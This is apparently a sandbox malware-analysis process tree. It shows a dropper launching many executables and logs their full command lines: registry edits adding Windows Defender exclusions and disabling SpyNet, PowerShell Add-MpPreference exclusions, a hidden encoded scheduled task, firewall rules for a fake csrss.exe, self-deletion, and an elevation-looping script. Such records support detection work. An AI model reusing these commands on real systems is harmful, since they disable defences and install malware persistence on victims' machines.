- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd83b69758,0x7ffd83b69768,0x7ffd83b69778
2⤵
PID:4072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:2
2⤵
PID:1652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:8
2⤵
PID:1744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2288 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:8
2⤵
PID:4532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2964 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:1
2⤵
PID:180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2976 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:1
2⤵
PID:1084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4620 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:1
2⤵
PID:440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4816 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:8
2⤵
PID:2444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4812 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:8
2⤵
PID:640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5132 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:8
2⤵
PID:5300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:8
2⤵
PID:5288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1856,i,3633861633657748259,15560977522309928323,131072 /prefetch:8
2⤵
PID:5420

C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
2⤵
PID:5668

C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff78d2a7688,0x7ff78d2a7698,0x7ff78d2a76a8
3⤵
PID:5684

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1440

C:\Users\Admin\Desktop\New Text Document.exe
"C:\Users\Admin\Desktop\New Text Document.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Users\Admin\Desktop\a\123.exe
"C:\Users\Admin\Desktop\a\123.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5372

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
- Drops startup file
PID:2876

C:\Users\Admin\Pictures\IqtYovCEr7qddejJPjjSWqZd.exe
"C:\Users\Admin\Pictures\IqtYovCEr7qddejJPjjSWqZd.exe"
4⤵
PID:1536

C:\Users\Admin\Pictures\IqtYovCEr7qddejJPjjSWqZd.exe
"C:\Users\Admin\Pictures\IqtYovCEr7qddejJPjjSWqZd.exe"
5⤵
PID:6132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0618595858.exe"
6⤵
PID:6524

C:\Users\Admin\AppData\Local\Temp\0618595858.exe
"C:\Users\Admin\AppData\Local\Temp\0618595858.exe"
7⤵
PID:1072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "IqtYovCEr7qddejJPjjSWqZd.exe" /f & erase "C:\Users\Admin\Pictures\IqtYovCEr7qddejJPjjSWqZd.exe" & exit
6⤵
PID:2936

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "IqtYovCEr7qddejJPjjSWqZd.exe" /f
7⤵
- Kills process with taskkill
PID:3156

C:\Users\Admin\Pictures\GpYQPgAH7M6IvEfTnPCztGP1.exe
"C:\Users\Admin\Pictures\GpYQPgAH7M6IvEfTnPCztGP1.exe"
4⤵
PID:4976

C:\Users\Admin\AppData\Local\Temp\is-C0KLJ.tmp\GpYQPgAH7M6IvEfTnPCztGP1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C0KLJ.tmp\GpYQPgAH7M6IvEfTnPCztGP1.tmp" /SL5="$9054C,2974431,224768,C:\Users\Admin\Pictures\GpYQPgAH7M6IvEfTnPCztGP1.exe"
5⤵
PID:5772

C:\Program Files (x86)\TAudioConverter\TAudioConverter.exe
"C:\Program Files (x86)\TAudioConverter\TAudioConverter.exe" -i
6⤵
PID:5832

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "TAC1028-1"
6⤵
PID:3912

C:\Program Files (x86)\TAudioConverter\TAudioConverter.exe
"C:\Program Files (x86)\TAudioConverter\TAudioConverter.exe" -s
6⤵
PID:4568

C:\Users\Admin\Pictures\xENP8vqplQe4LzPAoh2otWvM.exe
"C:\Users\Admin\Pictures\xENP8vqplQe4LzPAoh2otWvM.exe"
4⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\xENP8vqplQe4LzPAoh2otWvM.exe" & exit
5⤵
PID:6376

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
6⤵
- Delays execution with timeout.exe
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1836
5⤵
- Program crash
PID:6924

C:\Users\Admin\Pictures\8qxDqdCwr3p8GMnC6PweyYRF.exe
"C:\Users\Admin\Pictures\8qxDqdCwr3p8GMnC6PweyYRF.exe"
4⤵
PID:6060

C:\Users\Admin\Pictures\mivMfPEdTKyVESwE8b9J9YWG.exe
"C:\Users\Admin\Pictures\mivMfPEdTKyVESwE8b9J9YWG.exe"
4⤵
PID:560

C:\Users\Admin\Pictures\GTEUlg8YiINoaauxlmGKu2th.exe
"C:\Users\Admin\Pictures\GTEUlg8YiINoaauxlmGKu2th.exe"
4⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\7zS5F67.tmp\Install.exe
.\Install.exe
5⤵
PID:2084

C:\Users\Admin\AppData\Local\Temp\7zS8389.tmp\Install.exe
.\Install.exe /VGngdidU "385118" /S
6⤵
PID:1704

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:6264

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:2696

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:5424

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:3624

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:3776

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:6796

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:6076

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:5952

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNkjEjlOe" /SC once /ST 00:16:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:7036

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gNkjEjlOe"
7⤵
PID:6772

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gNkjEjlOe"
7⤵
PID:7084

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bsxbnVOyALBYOoKnMh" /SC once /ST 17:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\CschRTb.exe\" pg /awsite_idMKC 385118 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:528

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "bsxbnVOyALBYOoKnMh"
7⤵
PID:3920

C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe
"C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe" --silent --allusers=0
4⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281740021\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281740021\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
5⤵
PID:5904

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281740021\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281740021\assistant\assistant_installer.exe" --version
5⤵
PID:6396

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281740021\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310281740021\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0xe81588,0xe81598,0xe815a4
6⤵
PID:3364

C:\Users\Admin\Pictures\hlrocQ8vwQ8bm4T2By8IUfP7.exe
"C:\Users\Admin\Pictures\hlrocQ8vwQ8bm4T2By8IUfP7.exe"
4⤵
PID:5852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:7056

C:\Users\Admin\Pictures\hlrocQ8vwQ8bm4T2By8IUfP7.exe
"C:\Users\Admin\Pictures\hlrocQ8vwQ8bm4T2By8IUfP7.exe"
5⤵
PID:9672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:10772

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "10772" "2372" "2304" "2376" "0" "0" "2380" "0" "0" "0" "0" "0"
7⤵
PID:8280

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:4544

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
7⤵
- Modifies Windows Firewall
PID:8848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:5900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:7716

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7716" "1904" "1772" "1908" "0" "0" "1912" "0" "0" "0" "0" "0"
7⤵
PID:976

C:\Users\Admin\Pictures\T2ys5dgrE64LVtrxBDaMSSo6.exe
"C:\Users\Admin\Pictures\T2ys5dgrE64LVtrxBDaMSSo6.exe"
4⤵
PID:5676

C:\Users\Admin\Pictures\PBPLS5Xi4wNf8nAF5rGKRpUW.exe
"C:\Users\Admin\Pictures\PBPLS5Xi4wNf8nAF5rGKRpUW.exe"
4⤵
PID:4264

C:\Users\Admin\Pictures\PcqK7QhgpxLRRGebAVuweLBK.exe
"C:\Users\Admin\Pictures\PcqK7QhgpxLRRGebAVuweLBK.exe"
4⤵
PID:1704

C:\Users\Admin\Pictures\PcqK7QhgpxLRRGebAVuweLBK.exe
"C:\Users\Admin\Pictures\PcqK7QhgpxLRRGebAVuweLBK.exe"
5⤵
PID:4868

C:\Users\Admin\Pictures\rQj5L5HqipuXKN7bYxT0Noxv.exe
"C:\Users\Admin\Pictures\rQj5L5HqipuXKN7bYxT0Noxv.exe"
4⤵
PID:9352

C:\Users\Admin\Pictures\rQj5L5HqipuXKN7bYxT0Noxv.exe
"C:\Users\Admin\Pictures\rQj5L5HqipuXKN7bYxT0Noxv.exe"
5⤵
PID:8852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7870759366.exe"
6⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\7870759366.exe
"C:\Users\Admin\AppData\Local\Temp\7870759366.exe"
7⤵
PID:3936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "rQj5L5HqipuXKN7bYxT0Noxv.exe" /f & erase "C:\Users\Admin\Pictures\rQj5L5HqipuXKN7bYxT0Noxv.exe" & exit
6⤵
PID:9856

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "rQj5L5HqipuXKN7bYxT0Noxv.exe" /f
7⤵
- Kills process with taskkill
PID:6912

C:\Users\Admin\Pictures\oGVujlW2EARSPLCbdMf4vc3q.exe
"C:\Users\Admin\Pictures\oGVujlW2EARSPLCbdMf4vc3q.exe"
4⤵
PID:8296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8296 -s 1656
5⤵
- Program crash
PID:6920

C:\Users\Admin\Pictures\a2WnlWnKPaIIZXbKSuWeldod.exe
"C:\Users\Admin\Pictures\a2WnlWnKPaIIZXbKSuWeldod.exe"
4⤵
PID:8008

C:\Users\Admin\Pictures\DfGZcWMCSjZ3z5DFS7eP3jmj.exe
"C:\Users\Admin\Pictures\DfGZcWMCSjZ3z5DFS7eP3jmj.exe"
4⤵
PID:10980

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
5⤵
PID:7772

C:\Users\Admin\Pictures\BnYtEug7joz7bLwQuGQFMst1.exe
"C:\Users\Admin\Pictures\BnYtEug7joz7bLwQuGQFMst1.exe"
4⤵
PID:7312

C:\Users\Admin\AppData\Local\Temp\7zS50B9.tmp\Install.exe
.\Install.exe
5⤵
PID:10668

C:\Users\Admin\AppData\Local\Temp\7zSA2D1.tmp\Install.exe
.\Install.exe /VGngdidU "385118" /S
6⤵
PID:9000

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:9784

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:6956

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:3544

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:4692

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gpThkZCng" /SC once /ST 04:45:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:6664

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gpThkZCng"
7⤵
PID:9576

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gpThkZCng"
7⤵
PID:7344

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bsxbnVOyALBYOoKnMh" /SC once /ST 17:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\rvYlkWK.exe\" pg /dXsite_idAWD 385118 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:2516

C:\Users\Admin\Pictures\CxvqfFDcO0eUjJ0iYugnHmgZ.exe
"C:\Users\Admin\Pictures\CxvqfFDcO0eUjJ0iYugnHmgZ.exe" --silent --allusers=0
4⤵
PID:5132

C:\Users\Admin\Pictures\CxvqfFDcO0eUjJ0iYugnHmgZ.exe
C:\Users\Admin\Pictures\CxvqfFDcO0eUjJ0iYugnHmgZ.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x69c55648,0x69c55658,0x69c55664
5⤵
PID:1708

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CxvqfFDcO0eUjJ0iYugnHmgZ.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CxvqfFDcO0eUjJ0iYugnHmgZ.exe" --version
5⤵
PID:1824

C:\Users\Admin\Pictures\LAg8taP0jClH3W9uVomyt8Cj.exe
"C:\Users\Admin\Pictures\LAg8taP0jClH3W9uVomyt8Cj.exe"
4⤵
PID:9164

C:\Users\Admin\AppData\Local\Temp\is-606O3.tmp\LAg8taP0jClH3W9uVomyt8Cj.tmp
"C:\Users\Admin\AppData\Local\Temp\is-606O3.tmp\LAg8taP0jClH3W9uVomyt8Cj.tmp" /SL5="$309E6,2974431,224768,C:\Users\Admin\Pictures\LAg8taP0jClH3W9uVomyt8Cj.exe"
5⤵
PID:9780

C:\Users\Admin\Pictures\sauGjDEdjJ3bijea4a7iWebc.exe
"C:\Users\Admin\Pictures\sauGjDEdjJ3bijea4a7iWebc.exe"
4⤵
PID:8488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
5⤵
PID:5820

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
PID:8960

C:\Users\Admin\Pictures\UkPV5yaTRiSm2PptxUpn1uZt.exe
"C:\Users\Admin\Pictures\UkPV5yaTRiSm2PptxUpn1uZt.exe"
4⤵
PID:8848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:6136

C:\Users\Admin\Pictures\UkPV5yaTRiSm2PptxUpn1uZt.exe
"C:\Users\Admin\Pictures\UkPV5yaTRiSm2PptxUpn1uZt.exe"
5⤵
PID:9412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:5304

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:1472

C:\Users\Admin\Pictures\zq6eKpAwcqf3yOf4k7T1sHWF.exe
"C:\Users\Admin\Pictures\zq6eKpAwcqf3yOf4k7T1sHWF.exe"
4⤵
PID:10996

C:\Users\Admin\Pictures\zq6eKpAwcqf3yOf4k7T1sHWF.exe
"C:\Users\Admin\Pictures\zq6eKpAwcqf3yOf4k7T1sHWF.exe"
5⤵
PID:5556

C:\Users\Admin\Pictures\CwZWqlH7hD8fR5A8yrQyZA58.exe
"C:\Users\Admin\Pictures\CwZWqlH7hD8fR5A8yrQyZA58.exe"
4⤵
PID:1812

C:\Users\Admin\Desktop\a\salo.exe
"C:\Users\Admin\Desktop\a\salo.exe"
2⤵
- Executes dropped EXE
PID:5508

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:1568

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:1936

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:2596

C:\Users\Admin\Desktop\a\audiodgse.exe
"C:\Users\Admin\Desktop\a\audiodgse.exe"
2⤵
- Executes dropped EXE
PID:5596

C:\Users\Admin\Desktop\a\audiodgse.exe
"C:\Users\Admin\Desktop\a\audiodgse.exe"
3⤵
PID:5696

C:\Users\Admin\Desktop\a\setup.exe
"C:\Users\Admin\Desktop\a\setup.exe"
2⤵
- Executes dropped EXE
PID:5656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # Elevate privileges if (-not (IsAdministrator)) { $proc = New-Object System.Diagnostics.Process $proc.StartInfo.WindowStyle = 'Hidden' $proc.StartInfo.FileName = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName $exclusionPaths = '${env:ProgramData}','${env:AppData}','${env:SystemDrive}\\' $proc.StartInfo.Arguments = '-Command "Add-MpPreference -ExclusionPath ""' + ($exclusionPaths -join ',') + '"""' $proc.StartInfo.UseShellExecute = $true $proc.StartInfo.Verb = 'runas' $proc.StartInfo.CreateNoWindow = $true try { $proc.Start() | Out-Null $proc.WaitForExit() | Out-Null [Environment]::Exit(1) } catch [System.ComponentModel.Win32Exception] { if ($AdminRightsRequired) { continue } else { break } } } else { break } } } function IsAdministrator { $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $principal = New-Object System.Security.Principal.WindowsPrincipal($identity) return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) } Get-Win"
3⤵
PID:4380

C:\Users\Admin\Desktop\a\win.exe
